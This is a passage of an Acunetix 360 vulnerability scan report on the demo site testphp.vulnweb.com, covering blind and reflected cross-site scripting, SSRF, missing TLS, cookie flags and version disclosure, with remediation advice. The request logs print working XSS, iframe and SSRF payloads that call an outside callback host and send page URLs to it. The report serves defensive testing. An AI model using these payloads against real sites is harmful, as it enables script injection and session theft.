User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc=4916613944329494&signup=signup&uphone=%3ciMg+src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22+onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhf3veiv5nqpdh4d82hup8zvgtcls-8eq%27%2b%27i9c.r87.me%2fr%2f%3f%27%2blocation.href%22%3e&uemail=invicti%40example.com&uuname=Smith&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:58:47 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:48 AM

8.10. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//x1wxpcayhfcrsshmyhauylh85uwgadgi...
POST	ucc	4916613944329494
POST	signup	signup
POST	uphone	3
POST	uemail	invicti@example.com
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	3

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 337
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=%3ciMg+src%3d%22%2f%2fr87.me%2fimages%2f1.jpg%22+onload%3d%22this.onload%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhfcrsshmyhauylh85uwgadgixsmkavlf%27%2b%27kza.r87.me%2fr%2f%3f%27%2blocation.href%22%3e&ucc=4916613944329494&signup=signup&uphone=3&uemail=invicti%40example.com&uuname=Smith&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:55:57 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:48 AM

8.11. http://testphp.vulnweb.com/secured/newuser.php

CONFIRMED

Method	Parameter	Value
POST	upass	Inv1@cti
POST	urname	Smith
POST	ucc	<iMg src=N onerror="this.onerror='';this.src='//x1wxpcayhftei2mf4n7libzdttfjwwezznrs5yvz'+'nl0.r87.m...
POST	signup	signup
POST	uphone	3
POST	uemail	invicti@example.com
POST	uuname	Smith
POST	upass2	Inv1@cti
POST	uaddress	3

Request Response Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 294
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

upass=Inv1%40cti&urname=Smith&ucc=%3ciMg+src%3dN+onerror%3d%22this.onerror%3d%27%27%3bthis.src%3d%27%2f%2fx1wxpcayhftei2mf4n7libzdttfjwwezznrs5yvz%27%2b%27nl0.r87.me%2fr%2f%3f%27%2blocation.href%22%3e&signup=signup&uphone=3&uemail=invicti%40example.com&uuname=Smith&upass2=Inv1%40cti&uaddress=3

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:56:41 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:48 AM

Show Remediation Hide Remediation

Remedy

External References

Remedy References

CLASSIFICATION

OWASP Top Ten 2021

A03

CVSS 3.0 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

9. [Possible] Blind Cross-site Scripting

HIGH

Acunetix 360 detected Possible Blind Cross-site Scripting via capturing a triggered DNS A request, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application, but was unable to confirm the vulnerability.

Impact

There are many different attacks that can be leveraged through the use of cross-site scripting, including:

Hijacking user's active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

9.1. http://testphp.vulnweb.com/hpp/?pp=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fx1wxpcayhfxfh7ipalwl72ygtaqqmftedy9k6k92qzs%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e

Method	Parameter	Value
GET	pp	'"--></style></scRipt><scRipt src="//x1wxpcayhfxfh7ipalwl72ygtaqqmftedy9k6k92qzs.r87.me"></s...

Certainty

Request Response Go to the highlighted output

Request

GET /hpp/?pp=%27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt%20src%3d%22%2f%2fx1wxpcayhfxfh7ipalwl72ygtaqqmftedy9k6k92qzs%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/hpp/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:56:28 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:48 AM

9.2. http://testphp.vulnweb.com/listproducts.php?artist=%3ciframe%20src%3d%22%2f%2fx1wxpcayhfprld4jzh5kstxkzefmxy15uvp9n0ycavc%26%2346%3br87%26%2346%3bme%22%3e%3c%2fiframe%3e

Method	Parameter	Value
GET	artist	<iframe src="//x1wxpcayhfprld4jzh5kstxkzefmxy15uvp9n0ycavc.r87.me"></iframe>

Certainty

Request Response Go to the highlighted output

Request

GET /listproducts.php?artist=%3ciframe%20src%3d%22%2f%2fx1wxpcayhfprld4jzh5kstxkzefmxy15uvp9n0ycavc%26%2346%3br87%26%2346%3bme%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/artists.php?artist=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:57:19 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:44 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:20 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:47 AM

9.3. http://testphp.vulnweb.com/listproducts.php?cat=%3ciframe%20src%3d%22%2f%2fx1wxpcayhfuzkkgjx4dxqvnxlxcqwvvafpcvaiv5nvo%26%2346%3br87%26%2346%3bme%22%3e%3c%2fiframe%3e

Method	Parameter	Value
GET	cat	<iframe src="//x1wxpcayhfuzkkgjx4dxqvnxlxcqwvvafpcvaiv5nvo.r87.me"></iframe>

Certainty

Request Response Go to the highlighted output

Request

GET /listproducts.php?cat=%3ciframe%20src%3d%22%2f%2fx1wxpcayhfuzkkgjx4dxqvnxlxcqwvvafpcvaiv5nvo%26%2346%3br87%26%2346%3bme%22%3e%3c%2fiframe%3e HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/categories.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 0

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:52:42 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:47 AM

Show Remediation Hide Remediation

Remedy

External References

Remedy References

CLASSIFICATION

OWASP Top Ten 2021

A03

CVSS 3.0 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	8.6 (High)
Temporal	8.6 (High)
Environmental	8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

10. [Possible] Cross-site Scripting

MEDIUM

Acunetix 360 detected Possible Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

Although Acunetix 360 believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Hijacking user's active session.
Changing the look of the page within the victim's browser.
Mounting a successful phishing attack.
Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

10.1. http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x018251)%3C/scRipt%3E&size=160

Method	Parameter	Value
GET	file	'"--></style></scRipt><scRipt>netsparker(0x018251)</scRipt>
GET	size	160

Notes

Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Proof URL

http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x018251)%3C/scRipt%3E&size=160

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x018251)%3C/scRipt%3E&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 183.3094

Total Bytes Received : 214

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:53:00 GMT


Warning: fopen('"--></style></scRipt><scRipt>netsparker(0x018251)</scRipt>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 25

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:31:19 AM
The Issue was detected during the Scan.	System	8/29/2021 9:06:27 AM
The Issue was detected during the Scan.	System	8/27/2021 8:53:00 AM
The Issue was detected during the Scan.	System	6/9/2021 1:24:21 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:15:39 AM

Show Remediation Hide Remediation

Remedy

This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-Cross-site Scripting libraries.

External References

Remedy References

CLASSIFICATION

OWASP Top Ten 2021

A03

CVSS 3.0 SCORE
Base	7.4 (High)
Temporal	7.4 (High)
Environmental	7.4 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base	7.4 (High)
Temporal	7.4 (High)
Environmental	7.4 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

11. [Possible] Server-Side Request Forgery

MEDIUM

Acunetix 360 detected a possible Server-Side Request Forgery by capturing a DNS request that was made to AcuMonitor but was unable to confirm the vulnerability.

Impact

Server-Side Request Forgery allows an attacker to make local and/or remote network requests while masquerading as the target server.

Vulnerabilities

11.1. http://testphp.vulnweb.com/showimage.php?file=http://r87.me/r/?id=x1wxpcayhfvakxhsgrvlwtqedvzmhibr1fjgsoibufw&size=160

Method	Parameter	Value
GET	file	http://r87.me/r/?id=x1wxpcayhfvakxhsgrvlwtqedvzmhibr1fjgsoibufw
GET	size	160

Certainty

Request Response Go to the highlighted output

Request

GET /showimage.php?file=http://r87.me/r/?id=x1wxpcayhfvakxhsgrvlwtqedvzmhibr1fjgsoibufw&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 0

Total Bytes Received : 214

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:53:24 GMT

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:54:45 AM
The Issue was detected during the Scan.	System	8/29/2021 9:38:21 AM
The Issue was detected during the Scan. The State was set to Present	System	8/27/2021 9:05:48 AM

Show Remediation Hide Remediation

Remedy

Where possible, do not use users' input for URLs.
If you definitely need dynamic URLs, use whitelisting. Make a list of valid, accepted URLs and do not accept other URLs.
Ensure that you only accept URLs those are located on the trusted domains.

External References

CWE-918: Server-Side Request Forgery (SSRF)

CLASSIFICATION

OWASP Top Ten 2021

A10

12. SSL/TLS Not Implemented

MEDIUM

Acunetix 360 detected that SSL/TLS is not implemented.

Impact

An attacker who is able to intercept your - or your users' - network traffic can read and modify any messages that are exchanged with your server.

That means that an attacker can see passwords in clear text, modify the appearance of your website, redirect the user to other web pages or steal session information.

Therefore no message you send to the server remains confidential.

Vulnerabilities

12.1. https://testphp.vulnweb.com/login.php

Certainty

Request Response Go to the highlighted output

Request

[SSL Connection]

Response

Response Time (ms) : 1

Total Bytes Received : 16

Body Length : 0

Is Compressed : No

[SSL Connection]

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:28:42 AM
The Issue was detected during the Scan.	System	8/29/2021 9:02:52 AM
The Issue was detected during the Scan.	System	8/27/2021 8:50:41 AM
The Issue was detected during the Scan.	System	6/9/2021 1:21:46 PM
The Issue was detected during the Scan.	System	6/9/2021 1:15:55 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:07:20 AM

Show Remediation Hide Remediation

Remedy

We suggest that you implement SSL/TLS properly, for example by using the Certbot tool provided by the Let's Encrypt certificate authority. It can automatically configure most modern web servers, e.g. Apache and Nginx to use SSL/TLS. Both the tool and the certificates are free and are usually installed within minutes.

CLASSIFICATION

OWASP Top Ten 2021

A02

CVSS 3.0 SCORE
Base	6.8 (Medium)
Temporal	6.1 (Medium)
Environmental	6.1 (Medium)

CVSS Vector String
CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

CVSS 3.1 SCORE
Base	6.8 (Medium)
Temporal	6.1 (Medium)
Environmental	6.1 (Medium)

CVSS Vector String
CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C

13. PHP session.use_only_cookies Is Disabled

MEDIUM

Acunetix 360 detected that the session.use_only_cookies PHP directive is disabled.

Impact

The session.use_only_cookies PHP directive makes PHP send session IDs exclusively in cookies, as opposed to appending them to the URL. While passing the session ID in the URL may have the perceived security benefit of preventing Cross-site Request Forgery (CSRF) vulnerabilities, it actually leads to dangerous session related vulnerabilities, such as session hijacking and session fixation. Session IDs may end up in log files or can be leaked via the Referer header or by other means. Additionally attackers can trick victims into logging into their own account.

Vulnerabilities

13.1. http://testphp.vulnweb.com/secured/phpinfo.php

Method	Parameter	Value
GET	URI-BASED	phpinfo.php

Certainty

Request Response Go to the highlighted output

Request

GET /secured/phpinfo.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 181.6873

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:54:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h2 {font-family: sans-serif;}
pre {margin: 0px; font-family: monospace;}
a:link {color: #000099; text-decoration: none; background-color: #ffffff;}
a:hover {text-decoration: underline;}
table {border-collapse: collapse;}
.center {text-align: center;}
.center table { margin-left: auto; margin-right: auto; text-align: left;}
.center th { text-align: center !important; }
td, th { border: 1px solid #000000; font-size: 75%; vertical-align: baseline;}
h1 {font-size: 150%;}
h2 {font-size: 125%;}
.p {text-align: left;}
.e {background-color: #ccccff; font-weight: bold; color: #000000;}
.h {background-color: #9999cc; font-weight: bold; color: #000000;}
.v {background-color: #cccccc; color: #000000;}
.vr {background-color: #cccccc; text-align: right; color: #000000;}
img {float: right; border: 0px;}
hr {width: 600px; background-color: #cccccc; border: 0px; height: 1px; color: #000000;}
</style>
<title>phpinfo()</title></head>
<body><div class="center">
<table border="0" cellpadding="3" width="600">
<tr class="h"><td>
<a href="http://www.php.net/"><img border="0" src="/secured/phpinfo.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42" alt="PHP Logo" /></a><h1 class="p">PHP Version 5.1.6</h1>
</td></tr>
</table><br />
<table border="0" cellpadding="3" width="600">
<tr><td class="e">System </td><td class="v">FreeBSD svn.local 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 10:40:27 UTC 2007     root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386 </td></tr>

<tr><td class="e">Build Date </td><td class="v">Jul 30 2007 12:20:0
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	9/28/2021 7:33:06 AM
The Issue was detected during the Scan.	System	8/29/2021 9:12:35 AM
The Issue was detected during the Scan.	System	8/27/2021 8:54:03 AM
The Issue was detected during the Scan.	System	6/9/2021 1:25:14 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:22:59 AM

Show Remediation Hide Remediation

Actions to Take

You can enable session.use_only_cookies from php.ini or .htaccess.

php.ini:

session.use_only_cookies = 'on'

.htaccess:

php_flag session.use_only_cookies on

Remedy

In order to prevent session IDs from being passed in the URL, enable session.use_only_cookies in your php.ini or .htaccess file.

External References

CLASSIFICATION

OWASP Top Ten 2021

A05

CVSS 3.0 SCORE
Base	8.1 (High)
Temporal	8.1 (High)
Environmental	8.1 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

CVSS 3.1 SCORE
Base	8.1 (High)
Temporal	8.1 (High)
Environmental	8.1 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

14. Cookie Not Marked as HttpOnly

LOW

CONFIRMED

Acunetix 360 identified a cookie not marked as HTTPOnly.

HTTPOnly cookies cannot be read by client-side scripts, therefore marking a cookie as HTTPOnly can provide an additional layer of protection against cross-site scripting attacks.

Impact

During a cross-site scripting attack, an attacker might easily access cookies and hijack the victim's session.

Vulnerabilities

14.1. http://testphp.vulnweb.com/AJAX/index.php

CONFIRMED

Identified Cookie(s)

mycookie

Cookie Source

JavaScript

Page Type

Other

Request Response Go to the highlighted output

Request

GET /AJAX/index.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/login.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 186.4678

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:48:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ajax test</title>
<link href="styles.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">
	var httpreq = null;	

	function SetContent(XML) {
		var items = XML.getElementsByTagName('items').item(0).getElementsByTagName('item');
		var inner = '<ul>';
		for(i=0; i<items.length; i++){
			inner = inner + '<li><a href="javascript:getInfo(\'' + items[i].attributes.item(0).value + '\', \'' + items[i].attributes.item(1).value + '\')">' + items[i].firstChild.nodeValue + '</a></li>';
		}
		
		inner = inner + '</ul>'
		
		cd = document.getElementById('contentDiv');
		cd.innerHTML = inner;
		
		id = document.getElementById('infoDiv');
		id.innerHTML = '';
	}

	function httpCompleted() {
		if (httpreq.readyState==4 && httpreq.status==200) {						
			SetContent(httpreq.responseXML);
			httpreq = null;
		}		
	}
	
	function SetInfo(XML) {
		var ii = XML.getElementsByTagName('iteminfo').item(0);
		var inner = '';
		
		inner = inner + '<p><strong>' + ii.getElementsByTagName('name').item(0).firstChild.nodeValue + '</strong></p>';
		
		pict  = ii.getElementsByTagName('picture');
		if(pict.length>0){
			inner = inner + '<img src="../showimage.php?file=' + pict.item(0).firstChild.nodeValue + '"/>';
		}
		
		descs = ii.getElementsByTagName('description');
		for (i=0; i<descs.length; i++){
			inner = inner + '<p>' + descs.item(i).firstChild.nodeValue + '</p>';
		}
		
		id = document.getElementById('infoDiv');
		id.innerHTML = inner;
	}
	
	functio
…

History

Message	Owner	Date
The Issue was detected during the Scan.	System	12/24/2021 7:16:48 AM
The Issue was detected during the Scan.	System	9/28/2021 7:26:53 AM
The Issue was detected during the Scan.	System	8/29/2021 9:00:56 AM
The Issue was detected during the Scan.	System	8/27/2021 8:48:47 AM
The Issue was detected during the Scan.	System	6/9/2021 1:19:41 PM
The Issue was detected during the Scan.	System	6/9/2021 1:13:35 PM
The Issue was detected during the Scan. The State was set to Present	System	5/6/2021 8:04:59 AM

Show Remediation Hide Remediation

Actions to Take

See the remedy for solution.
Consider marking all of the cookies used by the application as HTTPOnly. (After these changes javascript code will not be able to read cookies.)

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defense against XSS. However this is not a silver bullet and will not protect the system against cross-site scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

CLASSIFICATION

OWASP Top Ten 2021

A05

15. Version Disclosure (PHP)

LOW

Acunetix 360 identified a version disclosure (PHP) in the target web server's HTTP response.

This information can help an attacker gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker might use the disclosed information to harvest specific security vulnerabilities for the version identified.

Vulnerabilities

15.1. http://testphp.vulnweb.com/login.php

Page Type

Extracted Version

5.6.40

Certainty

Request Response Go to the highlighted output

Request

GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 2060.161

Total Bytes Received : 228

Body Length : 0

Is Compressed : No

HTTP/1.1 200 OK
Server: nginx/1.19.0
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Connection: keep-alive
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Date: Fri, 27 Aug 2021 08:48:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2">

<!-- InstanceBeginEditable name="document_title_rgn" -->
<title>login page</title>
<!-- InstanceEndEditable -->
<link rel="stylesheet" href="style.css" type="text/css">
<!-- InstanceBeginEditable name="headers_rgn" -->
<!-- here goes headers headers -->
<!-- InstanceEndEditable -->
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
